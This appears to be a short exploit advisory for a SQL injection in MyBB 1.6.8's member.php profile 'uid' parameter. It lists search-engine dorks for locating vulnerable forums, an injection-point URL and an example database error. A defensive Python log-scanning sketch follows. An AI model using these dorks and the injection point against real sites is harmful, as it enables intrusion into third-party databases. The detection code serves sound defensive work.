MyBB 1.6.8 SQL Injection Vulnerability
-====Dork====-
inurl:member.php?action=profile&uid=
inurl:action=profile&uid=27
-====Exploit====-
http://www.Site.com/forums/member.php?ac...ofile&uid=[Sqli]
-====Example====-
http://www.Site.com/forums/member.php?ac...ile&uid=9
http://www.Site.com/forums/member.php?ac...le&uid=9'
-====Information====-
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0'
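
For defenders, the malformed profile request shown above leaves a trace in web server access logs: a member.php?action=profile request whose uid is not a plain number. The Python sketch below is an added example, not part of the original advisory; it assumes combined-format access logs, and the function names, addresses and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: combined-format access log; capture the request target.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /forums/member.php?action=profile&uid=9 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2013:10:00:05 +0000] "GET /forums/member.php?action=profile&uid=9%27 HTTP/1.1" 200 1843',
    '192.0.2.44 - - [01/Jan/2013:10:00:09 +0000] "GET /forums/member.php?uid=9\'&action=profile HTTP/1.1" 200 1843',
    '192.0.2.10 - - [01/Jan/2013:10:00:12 +0000] "GET /forums/member.php?action=login HTTP/1.1" 200 2210',
    '192.0.2.10 - - [01/Jan/2013:10:00:15 +0000] "GET /forums/showthread.php?tid=4&uid=x HTTP/1.1" 200 900',
]


def suspicious_uid(target):
    """Return the decoded uid if a member.php profile request has a non-numeric uid."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != "member.php":
        return None
    params = parse_qs(parts.query)  # percent-decodes, so %27 becomes '
    if "profile" not in params.get("action", []):
        return None
    for uid in params.get("uid", []):  # check every copy of a repeated parameter
        if not re.fullmatch(r"[0-9]+", uid):
            return uid
    return None


def scan(lines):
    """Return (line_number, decoded_uid) for each log line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            uid = suspicious_uid(match.group(1))
            if uid is not None:
                hits.append((number, uid))
    return hits


if __name__ == "__main__":
    for number, uid in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric uid {uid!r}")
```

The same numeric-only rule is what the application should enforce on uid before it reaches a query, so a hit in the logs also points at input that was never validated.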